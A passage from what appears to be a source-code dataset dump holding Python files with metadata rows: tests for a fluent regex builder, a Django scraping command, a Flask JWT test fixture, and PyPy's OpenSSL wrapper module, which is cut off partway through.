####################################################################################################################
@staticmethod
def load(filename):
return open(os.path.join(data_dir, filename)).read()
####################################################################################################################
def assert_groups(self, text, rex, re_compiled, expected_groups):
re_groups = re.search(re_compiled, text).groups()
msg = "Regular expression failed: {} != {}".format(tuple(expected_groups), re_groups)
self.assertEqual(tuple(expected_groups), re_groups, msg=msg)
print("Rex expression: ", rex.expression())
rex_groups = re.search(rex.compile(), text).groups()
msg = "Rex expression failed: {} != {}".format(tuple(expected_groups), rex_groups)
self.assertEqual(tuple(expected_groups), rex_groups, msg=msg)
########################################################################################################################
class TestRexGroup(RexAssertions):
####################################################################################################################
def test_plain_text(self):
rex = Rex().group.a.b.c.end_group
self.assert_groups("abc", rex, re.compile("(abc)"), expected_groups=("abc", ))
####################################################################################################################
def test_single_group_in_parenthesis(self):
rex = Rex().group.open_parenthesis.a.b.c.close_parenthesis.end_group
re_compiled = re.compile("(\(abc\))")
expected_groups = ("(abc)", )
self.assert_groups("(abc)", rex, re_compiled, expected_groups)
self.assert_groups("blah(abc)blah", rex, re_compiled, expected_groups)
self.assert_groups("((blah)(abc)(blah))", rex, re_compiled, expected_groups)
####################################################################################################################
def test_multiple_groups_in_parenthesis(self):
rex = (Rex().group.open_parenthesis.a.b.c.close_parenthesis.end_group
.zero_or_more_of_any_character.optional
.group.open_parenthesis.e.f.g.close_parenthesis.end_group)
re_compiled = re.compile("(\(abc\)).*?(\(efg\))")
expected_groups = ("(abc)", "(efg)")
self.assert_groups("(abc)(efg)", rex, re_compiled, expected_groups)
self.assert_groups("blah(abc)blah(efg)", rex, re_compiled, expected_groups)
self.assert_groups("((blah)(abc)(bl(efg)ah))", rex, re_compiled, expected_groups)
########################################################################################################################
class TestRex(RexAssertions):
####################################################################################################################
def assert_expression(self, text, rex, re_compiled):
self.assertTrue(re.search(re_compiled, text))
self.assertTrue(re.search(rex.compile(), text))
####################################################################################################################
def test_plain_text(self):
blah = Rex().b.l.a.h
self.assert_expression("blergblahb loasdf", blah, re.compile("blah"))
# since each property returns 'self', calling more will
# append more characters to _expression/expression()
blahbloop = blah.b.l.o.o.p
self.assert_expression("blergblahbloop loasdf", blahbloop, re.compile("blahbloop"))
carlos = Rex().C.a.r.l.o.s
self.assert_expression("blergblahbloop loasdf", blahbloop, re.compile("blahbloop"))
self.assert_expression("blerCarlosp loasdf", carlos, re.compile("Carlos"))
# blah and blahbloop should be the same object
self.assertEqual(blah, blahbloop)
self.assertNotEqual(blah, carlos)
# Since 'carlos' was instantiated with the 'write' property
# it should be a distinct object from the others
self.assertNotEqual(blahbloop, carlos)
####################################################################################################################
def test_datetimes(self):
re_compiled = re.compile("10-22-2016 7:51 am")
rex = (Rex()._1._0.dash._2._2.dash._2._0._1._6
.single_space
._7.colon._5._1.single_space.a.m)
self.assert_expression("The date is 10-22-2016 7:51 am right now.", rex, re_compiled)
####################################################################################################################
def test_5_digit_zip_code(self):
self.assert_expression("blah73139 blah", Rex()._5.digits, re.compile("\d{5}"))
####################################################################################################################
def test_phone_number_pattern__with_dashes(self):
self.assert_groups(text="blah405-867-5309 blah 723",
rex=Rex().group._3.digits.dash._3.digits.dash._4.digits.end_group,
re_compiled=re.compile(r"(\d{3}-\d{3}-\d{4})"),
expected_groups=("405-867-5309",))
####################################################################################################################
def test_phone_number_pattern__with_dots(self):
self.assert_groups(text="blah405.867.5309 blah 723",
rex=(Rex().group
._3.digits.dot._3.digits.dot._4.digits
.end_group),
re_compiled=re.compile("(\d{3}\.\d{3}\.\d{4})"),
expected_groups=("405.867.5309",))
####################################################################################################################
def test_phone_number_pattern__with_parenthesis(self):
self.assert_groups(text="blah(405) 867-5309 blah 723",
rex=(Rex().group
.open_parenthesis._3.digits.close_parenthesis
.single_space._3.digits.dash._4.digits
.end_group),
re_compiled=re.compile("(\(\d{3}\)\s\d{3}-\d{4})"),
expected_groups=("(405) 867-5309",))
####################################################################################################################
def test_phone_number_pattern__with_groups(self):
rex = (Rex().open_parenthesis
.group._3.digits.end_group
.close_parenthesis.single_space
.group._3.digits.end_group
.dash
.group._4.digits.end_group)
re_compiled = re.compile("\((\d{3})\)\s(\d{3})-(\d{4})")
self.assert_groups(text="Phone number (405) 867-5309.",
rex=rex,
re_compiled=re_compiled,
expected_groups=("405", "867", "5309"))
####################################################################################################################
def test_zero_or_more_of(self):
rex = (Rex().less_than_sign.s.p.a.n.greater_than_sign
.group.zero_or_more_of.any_character.end_group
.less_than_sign.forwardslash.s.p.a.n.greater_than_sign)
re_compiled = re.compile("<span>(.*)</span>")
self.assert_groups(text="<span>heyo</span>",
rex=rex,
re_compiled=re_compiled,
expected_groups=["heyo"])
self.assert_groups(text="<span></span>",
rex=rex,
re_compiled=re_compiled,
expected_groups=[""])
self.assert_groups(text="<span>*</span>",
rex=rex,
re_compiled=re_compiled,
expected_groups=["*"])
########################################################################################################################
class TestRexAgainstPrices(RexAssertions):
####################################################################################################################
def test_with_2_decimals(self):
re_compiled = re.compile('\$(\d+\.\d{2})')
rex = Rex().group.one_or_more_numbers.dot._2.numbers.end_group
self.assert_groups(text="The price is $19.99 plus tax.",
rex=rex,
re_compiled=re_compiled,
expected_groups=["19.99"])
####################################################################################################################
def test_ending_in_9(self):
re_compiled = re.compile('\$(\d+\.\d9)')
rex = Rex().group.one_or_more_numbers.dot.digit._9.end_group
self.assert_groups(text="The prices are is $19.99 plus tax.",
rex=rex,
re_compiled=re_compiled,
expected_groups=["19.99"])
| 51.069519 | 120 | 0.43644 | 876 | 9,550 | 4.504566 | 0.189498 | 0.083629 | 0.064876 | 0.079067 | 0.601622 | 0.506082 | 0.416878 | 0.367461 | 0.342119 | 0.279777 | 0 | 0.023555 | 0.217592 | 9,550 | 186 | 121 | 51.344086 | 0.50455 | 0.026597 | 0 | 0.192 | 0 | 0 | 0.118493 | 0.016969 | 0 | 0 | 0 | 0 | 0.28 | 1 | 0.128 | false | 0 | 0.032 | 0.008 | 0.2 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e960a8f772219fae68b8457d40dccf32514388f | 751 | py | Python | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | null | null | null | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | 4 | 2020-02-11T21:31:46.000Z | 2020-06-05T00:43:08.000Z | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from bs4 import BeautifulSoup
import requests
from apps.products.models import ShopDepartment, Brand
class Command(BaseCommand):
def handle(self, *args, **options):
Brand.objects.all().delete()
url_base = 'https://www.gearbest.com'
shop_departments = ShopDepartment.objects.filter(active=True)
pk = 0
for shop_department in shop_departments:
print(url_base + shop_department.web_url)
url_shop = url_base + shop_department.web_url
url = requests.get(url_shop)
soup = BeautifulSoup(url.text, 'html.parser')
results = soup.find_all('section', attrs={'class': 'block_b'})
cont = 0
| 31.291667 | 74 | 0.660453 | 90 | 751 | 5.355556 | 0.6 | 0.043568 | 0.045643 | 0.087137 | 0.124481 | 0.124481 | 0.124481 | 0 | 0 | 0 | 0 | 0.005254 | 0.23968 | 751 | 23 | 75 | 32.652174 | 0.838879 | 0 | 0 | 0 | 0 | 0 | 0.071904 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.352941 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e96d10c6dfb2e778fd6a5f0ef1d12d94ce2fa31 | 354 | py | Python | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | import pytest
from flask_jwt_extended import create_access_token
@pytest.fixture(scope='session')
def test_client(flask_app):
with flask_app.app_context():
token = create_access_token(identity='testclient')
client = flask_app.test_client()
client.environ_base['HTTP_AUTHORIZATION'] = 'Bearer ' + token
return client
| 29.5 | 69 | 0.728814 | 44 | 354 | 5.545455 | 0.590909 | 0.098361 | 0.139344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177966 | 354 | 11 | 70 | 32.181818 | 0.838488 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e9f3f08204ee8f26c7ee597a5331c470cf5a81b | 35,006 | py | Python | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | 1 | 2020-01-21T11:10:51.000Z | 2020-01-21T11:10:51.000Z | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | from __future__ import with_statement
from pypy.rpython.lltypesystem import rffi, lltype
from pypy.interpreter.error import OperationError
from pypy.interpreter.baseobjspace import Wrappable
from pypy.interpreter.typedef import TypeDef
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.rlib.rarithmetic import intmask
from pypy.rlib import rpoll, rsocket
from pypy.rlib.ropenssl import *
from pypy.module._socket import interp_socket
## user defined constants
X509_NAME_MAXLEN = 256
## # these mirror ssl.h
PY_SSL_ERROR_NONE, PY_SSL_ERROR_SSL = 0, 1
PY_SSL_ERROR_WANT_READ, PY_SSL_ERROR_WANT_WRITE = 2, 3
PY_SSL_ERROR_WANT_X509_LOOKUP = 4
PY_SSL_ERROR_SYSCALL = 5 # look at error stack/return value/errno
PY_SSL_ERROR_ZERO_RETURN, PY_SSL_ERROR_WANT_CONNECT = 6, 7
# start of non ssl.h errorcodes
PY_SSL_ERROR_EOF = 8 # special case of SSL_ERROR_SYSCALL
PY_SSL_ERROR_INVALID_ERROR_CODE = 9
PY_SSL_CERT_NONE, PY_SSL_CERT_OPTIONAL, PY_SSL_CERT_REQUIRED = 0, 1, 2
PY_SSL_CLIENT, PY_SSL_SERVER = 0, 1
(PY_SSL_VERSION_SSL2, PY_SSL_VERSION_SSL3,
PY_SSL_VERSION_SSL23, PY_SSL_VERSION_TLS1) = range(4)
SOCKET_IS_NONBLOCKING, SOCKET_IS_BLOCKING = 0, 1
SOCKET_HAS_TIMED_OUT, SOCKET_HAS_BEEN_CLOSED = 2, 3
SOCKET_TOO_LARGE_FOR_SELECT, SOCKET_OPERATION_OK = 4, 5
HAVE_RPOLL = True # Even win32 has rpoll.poll
constants = {}
constants["SSL_ERROR_ZERO_RETURN"] = PY_SSL_ERROR_ZERO_RETURN
constants["SSL_ERROR_WANT_READ"] = PY_SSL_ERROR_WANT_READ
constants["SSL_ERROR_WANT_WRITE"] = PY_SSL_ERROR_WANT_WRITE
constants["SSL_ERROR_WANT_X509_LOOKUP"] = PY_SSL_ERROR_WANT_X509_LOOKUP
constants["SSL_ERROR_SYSCALL"] = PY_SSL_ERROR_SYSCALL
constants["SSL_ERROR_SSL"] = PY_SSL_ERROR_SSL
constants["SSL_ERROR_WANT_CONNECT"] = PY_SSL_ERROR_WANT_CONNECT
constants["SSL_ERROR_EOF"] = PY_SSL_ERROR_EOF
constants["SSL_ERROR_INVALID_ERROR_CODE"] = PY_SSL_ERROR_INVALID_ERROR_CODE
constants["CERT_NONE"] = PY_SSL_CERT_NONE
constants["CERT_OPTIONAL"] = PY_SSL_CERT_OPTIONAL
constants["CERT_REQUIRED"] = PY_SSL_CERT_REQUIRED
if not OPENSSL_NO_SSL2:
constants["PROTOCOL_SSLv2"] = PY_SSL_VERSION_SSL2
constants["PROTOCOL_SSLv3"] = PY_SSL_VERSION_SSL3
constants["PROTOCOL_SSLv23"] = PY_SSL_VERSION_SSL23
constants["PROTOCOL_TLSv1"] = PY_SSL_VERSION_TLS1
constants["OPENSSL_VERSION_NUMBER"] = OPENSSL_VERSION_NUMBER
ver = OPENSSL_VERSION_NUMBER
ver, status = divmod(ver, 16)
ver, patch = divmod(ver, 256)
ver, fix = divmod(ver, 256)
ver, minor = divmod(ver, 256)
ver, major = divmod(ver, 256)
constants["OPENSSL_VERSION_INFO"] = (major, minor, fix, patch, status)
constants["OPENSSL_VERSION"] = SSLEAY_VERSION
def ssl_error(space, msg, errno=0):
w_exception_class = get_error(space)
w_exception = space.call_function(w_exception_class,
space.wrap(errno), space.wrap(msg))
return OperationError(w_exception_class, w_exception)
if HAVE_OPENSSL_RAND:
# helper routines for seeding the SSL PRNG
@unwrap_spec(string=str, entropy=float)
def RAND_add(space, string, entropy):
"""RAND_add(string, entropy)
Mix string into the OpenSSL PRNG state. entropy (a float) is a lower
bound on the entropy contained in string."""
buf = rffi.str2charp(string)
try:
libssl_RAND_add(buf, len(string), entropy)
finally:
rffi.free_charp(buf)
def RAND_status(space):
"""RAND_status() -> 0 or 1
Returns 1 if the OpenSSL PRNG has been seeded with enough data and 0 if not.
It is necessary to seed the PRNG with RAND_add() on some platforms before
using the ssl() function."""
res = libssl_RAND_status()
return space.wrap(res)
@unwrap_spec(path=str)
def RAND_egd(space, path):
"""RAND_egd(path) -> bytes
Queries the entropy gather daemon (EGD) on socket path. Returns number
of bytes read. Raises socket.sslerror if connection to EGD fails or
if it does provide enough data to seed PRNG."""
socket_path = rffi.str2charp(path)
try:
bytes = libssl_RAND_egd(socket_path)
finally:
rffi.free_charp(socket_path)
if bytes == -1:
msg = "EGD connection failed or EGD did not return"
msg += " enough data to seed the PRNG"
raise ssl_error(space, msg)
return space.wrap(bytes)
class SSLObject(Wrappable):
def __init__(self, space):
self.space = space
self.w_socket = None
self.ctx = lltype.nullptr(SSL_CTX.TO)
self.ssl = lltype.nullptr(SSL.TO)
self.peer_cert = lltype.nullptr(X509.TO)
self._server = lltype.malloc(rffi.CCHARP.TO, X509_NAME_MAXLEN, flavor='raw')
self._server[0] = '\0'
self._issuer = lltype.malloc(rffi.CCHARP.TO, X509_NAME_MAXLEN, flavor='raw')
self._issuer[0] = '\0'
self.shutdown_seen_zero = False
def server(self):
return self.space.wrap(rffi.charp2str(self._server))
def issuer(self):
return self.space.wrap(rffi.charp2str(self._issuer))
def __del__(self):
self.enqueue_for_destruction(self.space, SSLObject.destructor,
'__del__() method of ')
def destructor(self):
assert isinstance(self, SSLObject)
if self.peer_cert:
libssl_X509_free(self.peer_cert)
if self.ssl:
libssl_SSL_free(self.ssl)
if self.ctx:
libssl_SSL_CTX_free(self.ctx)
lltype.free(self._server, flavor='raw')
lltype.free(self._issuer, flavor='raw')
@unwrap_spec(data='bufferstr')
def write(self, data):
"""write(s) -> len
Writes the string s into the SSL object. Returns the number
of bytes written."""
self._refresh_nonblocking(self.space)
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, True)
if sockstate == SOCKET_HAS_TIMED_OUT:
raise ssl_error(self.space, "The write operation timed out")
elif sockstate == SOCKET_HAS_BEEN_CLOSED:
raise ssl_error(self.space, "Underlying socket has been closed.")
elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
raise ssl_error(self.space, "Underlying socket too large for select().")
num_bytes = 0
while True:
err = 0
num_bytes = libssl_SSL_write(self.ssl, data, len(data))
err = libssl_SSL_get_error(self.ssl, num_bytes)
if err == SSL_ERROR_WANT_READ:
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, False)
elif err == SSL_ERROR_WANT_WRITE:
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, True)
else:
sockstate = SOCKET_OPERATION_OK
if sockstate == SOCKET_HAS_TIMED_OUT:
raise ssl_error(self.space, "The write operation timed out")
elif sockstate == SOCKET_HAS_BEEN_CLOSED:
raise ssl_error(self.space, "Underlying socket has been closed.")
elif sockstate == SOCKET_IS_NONBLOCKING:
break
if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
continue
else:
break
if num_bytes > 0:
return self.space.wrap(num_bytes)
else:
raise _ssl_seterror(self.space, self, num_bytes)
def pending(self):
"""pending() -> count
Returns the number of already decrypted bytes available for read,
pending on the connection."""
count = libssl_SSL_pending(self.ssl)
if count < 0:
raise _ssl_seterror(self.space, self, count)
return self.space.wrap(count)
@unwrap_spec(num_bytes=int)
def read(self, num_bytes=1024):
"""read([len]) -> string
Read up to len bytes from the SSL socket."""
count = libssl_SSL_pending(self.ssl)
if not count:
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, False)
if sockstate == SOCKET_HAS_TIMED_OUT:
raise ssl_error(self.space, "The read operation timed out")
elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
raise ssl_error(self.space, "Underlying socket too large for select().")
elif sockstate == SOCKET_HAS_BEEN_CLOSED:
if libssl_SSL_get_shutdown(self.ssl) == SSL_RECEIVED_SHUTDOWN:
return self.space.wrap('')
raise ssl_error(self.space, "Socket closed without SSL shutdown handshake")
raw_buf, gc_buf = rffi.alloc_buffer(num_bytes)
while True:
err = 0
count = libssl_SSL_read(self.ssl, raw_buf, num_bytes)
err = libssl_SSL_get_error(self.ssl, count)
if err == SSL_ERROR_WANT_READ:
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, False)
elif err == SSL_ERROR_WANT_WRITE:
sockstate = check_socket_and_wait_for_timeout(self.space,
self.w_socket, True)
elif (err == SSL_ERROR_ZERO_RETURN and
libssl_SSL_get_shutdown(self.ssl) == SSL_RECEIVED_SHUTDOWN):
return self.space.wrap("")
else:
sockstate = SOCKET_OPERATION_OK
if sockstate == SOCKET_HAS_TIMED_OUT:
raise ssl_error(self.space, "The read operation timed out")
elif sockstate == SOCKET_IS_NONBLOCKING:
break
if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
continue
else:
break
if count <= 0:
raise _ssl_seterror(self.space, self, count)
result = rffi.str_from_buffer(raw_buf, gc_buf, num_bytes, count)
rffi.keep_buffer_alive_until_here(raw_buf, gc_buf)
return self.space.wrap(result)
def _refresh_nonblocking(self, space):
# just in case the blocking state of the socket has been changed
w_timeout = space.call_method(self.w_socket, "gettimeout")
nonblocking = not space.is_w(w_timeout, space.w_None)
libssl_BIO_set_nbio(libssl_SSL_get_rbio(self.ssl), nonblocking)
libssl_BIO_set_nbio(libssl_SSL_get_wbio(self.ssl), nonblocking)
def do_handshake(self, space):
self._refresh_nonblocking(space)
# Actually negotiate SSL connection
# XXX If SSL_do_handshake() returns 0, it's also a failure.
while True:
ret = libssl_SSL_do_handshake(self.ssl)
err = libssl_SSL_get_error(self.ssl, ret)
# XXX PyErr_CheckSignals()
if err == SSL_ERROR_WANT_READ:
sockstate = check_socket_and_wait_for_timeout(
space, self.w_socket, False)
elif err == SSL_ERROR_WANT_WRITE:
sockstate = check_socket_and_wait_for_timeout(
space, self.w_socket, True)
else:
sockstate = SOCKET_OPERATION_OK
if sockstate == SOCKET_HAS_TIMED_OUT:
raise ssl_error(space, "The handshake operation timed out")
elif sockstate == SOCKET_HAS_BEEN_CLOSED:
raise ssl_error(space, "Underlying socket has been closed.")
elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
raise ssl_error(space, "Underlying socket too large for select().")
elif sockstate == SOCKET_IS_NONBLOCKING:
break
if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
continue
else:
break
if ret <= 0:
raise _ssl_seterror(space, self, ret)
if self.peer_cert:
libssl_X509_free(self.peer_cert)
self.peer_cert = libssl_SSL_get_peer_certificate(self.ssl)
if self.peer_cert:
libssl_X509_NAME_oneline(
libssl_X509_get_subject_name(self.peer_cert),
self._server, X509_NAME_MAXLEN)
libssl_X509_NAME_oneline(
libssl_X509_get_issuer_name(self.peer_cert),
self._issuer, X509_NAME_MAXLEN)
def shutdown(self, space):
# Guard against closed socket
w_fileno = space.call_method(self.w_socket, "fileno")
if space.int_w(w_fileno) < 0:
raise ssl_error(space, "Underlying socket has been closed")
self._refresh_nonblocking(space)
zeros = 0
while True:
# Disable read-ahead so that unwrap can work correctly.
# Otherwise OpenSSL might read in too much data,
# eating clear text data that happens to be
# transmitted after the SSL shutdown.
# Should be safe to call repeatedly everytime this
# function is used and the shutdown_seen_zero != 0
# condition is met.
if self.shutdown_seen_zero:
libssl_SSL_set_read_ahead(self.ssl, 0)
ret = libssl_SSL_shutdown(self.ssl)
# if err == 1, a secure shutdown with SSL_shutdown() is complete
if ret > 0:
break
if ret == 0:
# Don't loop endlessly; instead preserve legacy
# behaviour of trying SSL_shutdown() only twice.
# This looks necessary for OpenSSL < 0.9.8m
zeros += 1
if zeros > 1:
break
# Shutdown was sent, now try receiving
self.shutdown_seen_zero = True
continue
# Possibly retry shutdown until timeout or failure
ssl_err = libssl_SSL_get_error(self.ssl, ret)
if ssl_err == SSL_ERROR_WANT_READ:
sockstate = check_socket_and_wait_for_timeout(
self.space, self.w_socket, False)
elif ssl_err == SSL_ERROR_WANT_WRITE:
sockstate = check_socket_and_wait_for_timeout(
self.space, self.w_socket, True)
else:
break
if sockstate == SOCKET_HAS_TIMED_OUT:
if ssl_err == SSL_ERROR_WANT_READ:
raise ssl_error(self.space, "The read operation timed out")
else:
raise ssl_error(self.space, "The write operation timed out")
elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
raise ssl_error(space, "Underlying socket too large for select().")
elif sockstate != SOCKET_OPERATION_OK:
# Retain the SSL error code
break
if ret < 0:
raise _ssl_seterror(space, self, ret)
return self.w_socket
def cipher(self, space):
if not self.ssl:
return space.w_None
current = libssl_SSL_get_current_cipher(self.ssl)
if not current:
return space.w_None
name = libssl_SSL_CIPHER_get_name(current)
if name:
w_name = space.wrap(rffi.charp2str(name))
else:
w_name = space.w_None
proto = libssl_SSL_CIPHER_get_version(current)
if proto:
w_proto = space.wrap(rffi.charp2str(name))
else:
w_proto = space.w_None
bits = libssl_SSL_CIPHER_get_bits(current,
lltype.nullptr(rffi.INTP.TO))
w_bits = space.newint(bits)
return space.newtuple([w_name, w_proto, w_bits])
@unwrap_spec(der=bool)
def peer_certificate(self, der=False):
"""peer_certificate([der=False]) -> certificate
Returns the certificate for the peer. If no certificate was provided,
returns None. If a certificate was provided, but not validated, returns
an empty dictionary. Otherwise returns a dict containing information
about the peer certificate.
If the optional argument is True, returns a DER-encoded copy of the
peer certificate, or None if no certificate was provided. This will
return the certificate even if it wasn't validated."""
if not self.peer_cert:
return self.space.w_None
if der:
# return cert in DER-encoded format
with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as buf_ptr:
buf_ptr[0] = lltype.nullptr(rffi.CCHARP.TO)
length = libssl_i2d_X509(self.peer_cert, buf_ptr)
if length < 0:
raise _ssl_seterror(self.space, self, length)
try:
# this is actually an immutable bytes sequence
return self.space.wrap(rffi.charpsize2str(buf_ptr[0],
length))
finally:
libssl_OPENSSL_free(buf_ptr[0])
else:
verification = libssl_SSL_CTX_get_verify_mode(
libssl_SSL_get_SSL_CTX(self.ssl))
if not verification & SSL_VERIFY_PEER:
return self.space.newdict()
else:
return _decode_certificate(self.space, self.peer_cert)
def _decode_certificate(space, certificate, verbose=False):
w_retval = space.newdict()
w_peer = _create_tuple_for_X509_NAME(
space, libssl_X509_get_subject_name(certificate))
space.setitem(w_retval, space.wrap("subject"), w_peer)
if verbose:
w_issuer = _create_tuple_for_X509_NAME(
space, libssl_X509_get_issuer_name(certificate))
space.setitem(w_retval, space.wrap("issuer"), w_issuer)
space.setitem(w_retval, space.wrap("version"),
space.wrap(libssl_X509_get_version(certificate)))
biobuf = libssl_BIO_new(libssl_BIO_s_mem())
try:
if verbose:
libssl_BIO_reset(biobuf)
serialNumber = libssl_X509_get_serialNumber(certificate)
libssl_i2a_ASN1_INTEGER(biobuf, serialNumber)
# should not exceed 20 octets, 160 bits, so buf is big enough
with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
length = libssl_BIO_gets(biobuf, buf, 99)
if length < 0:
raise _ssl_seterror(space, None, length)
w_serial = space.wrap(rffi.charpsize2str(buf, length))
space.setitem(w_retval, space.wrap("serialNumber"), w_serial)
libssl_BIO_reset(biobuf)
notBefore = libssl_X509_get_notBefore(certificate)
libssl_ASN1_TIME_print(biobuf, notBefore)
with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
length = libssl_BIO_gets(biobuf, buf, 99)
if length < 0:
raise _ssl_seterror(space, None, length)
w_date = space.wrap(rffi.charpsize2str(buf, length))
space.setitem(w_retval, space.wrap("notBefore"), w_date)
libssl_BIO_reset(biobuf)
notAfter = libssl_X509_get_notAfter(certificate)
libssl_ASN1_TIME_print(biobuf, notAfter)
with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
length = libssl_BIO_gets(biobuf, buf, 99)
if length < 0:
raise _ssl_seterror(space, None, length)
w_date = space.wrap(rffi.charpsize2str(buf, length))
space.setitem(w_retval, space.wrap("notAfter"), w_date)
finally:
libssl_BIO_free(biobuf)
# Now look for subjectAltName
w_alt_names = _get_peer_alt_names(space, certificate)
if w_alt_names is not space.w_None:
space.setitem(w_retval, space.wrap("subjectAltName"), w_alt_names)
return w_retval
def _create_tuple_for_X509_NAME(space, xname):
entry_count = libssl_X509_NAME_entry_count(xname)
dn_w = []
rdn_w = []
rdn_level = -1
for index in range(entry_count):
entry = libssl_X509_NAME_get_entry(xname, index)
# check to see if we've gotten to a new RDN
entry_level = intmask(entry[0].c_set)
if rdn_level >= 0:
if rdn_level != entry_level:
# yes, new RDN
# add old RDN to DN
dn_w.append(space.newtuple(list(rdn_w)))
rdn_w = []
rdn_level = entry_level
# Now add this attribute to the current RDN
name = libssl_X509_NAME_ENTRY_get_object(entry)
value = libssl_X509_NAME_ENTRY_get_data(entry)
attr = _create_tuple_for_attribute(space, name, value)
rdn_w.append(attr)
# Now, there is typically a dangling RDN
if rdn_w:
dn_w.append(space.newtuple(list(rdn_w)))
return space.newtuple(list(dn_w))
def _get_peer_alt_names(space, certificate):
# this code follows the procedure outlined in
# OpenSSL's crypto/x509v3/v3_prn.c:X509v3_EXT_print()
# function to extract the STACK_OF(GENERAL_NAME),
# then iterates through the stack to add the
# names.
if not certificate:
return space.w_None
# get a memory buffer
biobuf = libssl_BIO_new(libssl_BIO_s_mem())
try:
alt_names_w = []
i = 0
while True:
i = libssl_X509_get_ext_by_NID(
certificate, NID_subject_alt_name, i)
if i < 0:
break
# now decode the altName
ext = libssl_X509_get_ext(certificate, i)
method = libssl_X509V3_EXT_get(ext)
if not method:
raise ssl_error(space,
"No method for internalizing subjectAltName!'")
with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as p_ptr:
p_ptr[0] = ext[0].c_value.c_data
length = intmask(ext[0].c_value.c_length)
null = lltype.nullptr(rffi.VOIDP.TO)
if method[0].c_it:
names = rffi.cast(GENERAL_NAMES, libssl_ASN1_item_d2i(
null, p_ptr, length,
libssl_ASN1_ITEM_ptr(method[0].c_it)))
else:
names = rffi.cast(GENERAL_NAMES, method[0].c_d2i(
null, p_ptr, length))
for j in range(libssl_sk_GENERAL_NAME_num(names)):
# Get a rendering of each name in the set of names
name = libssl_sk_GENERAL_NAME_value(names, j)
if intmask(name[0].c_type) == GEN_DIRNAME:
# we special-case DirName as a tuple of tuples of attributes
dirname = libssl_pypy_GENERAL_NAME_dirn(name)
w_t = space.newtuple([
space.wrap("DirName"),
_create_tuple_for_X509_NAME(space, dirname)
])
else:
# for everything else, we use the OpenSSL print form
libssl_BIO_reset(biobuf)
libssl_GENERAL_NAME_print(biobuf, name)
with lltype.scoped_alloc(rffi.CCHARP.TO, 2048) as buf:
length = libssl_BIO_gets(biobuf, buf, 2047)
if length < 0:
raise _ssl_seterror(space, None, 0)
v = rffi.charpsize2str(buf, length)
v1, v2 = v.split(':', 1)
w_t = space.newtuple([space.wrap(v1),
space.wrap(v2)])
alt_names_w.append(w_t)
finally:
libssl_BIO_free(biobuf)
if alt_names_w:
return space.newtuple(list(alt_names_w))
else:
return space.w_None
def _create_tuple_for_attribute(space, name, value):
with lltype.scoped_alloc(rffi.CCHARP.TO, X509_NAME_MAXLEN) as buf:
length = libssl_OBJ_obj2txt(buf, X509_NAME_MAXLEN, name, 0)
if length < 0:
raise _ssl_seterror(space, None, 0)
w_name = space.wrap(rffi.charpsize2str(buf, length))
with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as buf_ptr:
length = libssl_ASN1_STRING_to_UTF8(buf_ptr, value)
if length < 0:
raise _ssl_seterror(space, None, 0)
